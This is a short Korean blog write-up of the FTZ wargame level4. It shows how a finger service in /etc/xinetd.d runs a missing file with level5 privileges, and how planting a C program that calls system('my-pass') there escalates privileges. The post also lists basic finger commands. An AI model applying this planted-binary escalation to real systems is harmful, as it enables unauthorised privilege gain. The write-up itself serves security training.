반응형
[FTZ] level4
level4 문제를 확인하면
/etc/xinetd.d/에 백도어가 있다고 한다.
* /etc/xinetd.d/ 디렉터리에는 xinetd 데몬이 참조하는 서비스 설정 파일들이 존재한다.
진짜 backdoor가 있다.
안에 내용을 보면 finger service 가 정의되어 있고,
user = level5 권한이고, server = /home/level4/tmp/backdoor 이 실행된다.
그러고 /home/level4/tmp/ 디렉터리에 들어가보니 파일이 없었다.
여기서부터 어떻게 해야 할지 헤매었는데
이 안에 backdoor 파일을 만들어 주면 된다.
#include <stdio.h>
#include <stdlib.h>
int main(void){
system("my-pass");
return 0;
}그러고 나서 finger 서비스를 실행해 준다.
finger : 리눅스에서 사용자의 계정정보를 확인하는 명령어
명령어
$ finger // 현재 시스템에 로그인되어 있는 사용자
$ finger user명 // host명시하지 않으면, finger는 로컬로 접속
$ finger @host명 // user명시하지 않으면, 해당서버에 접속한 모든 유저정보 출력
$ finger user @host명 // 원격서버의 사용자계정정보 확인
reference : https://taeminimini.tistory.com/373
반응형
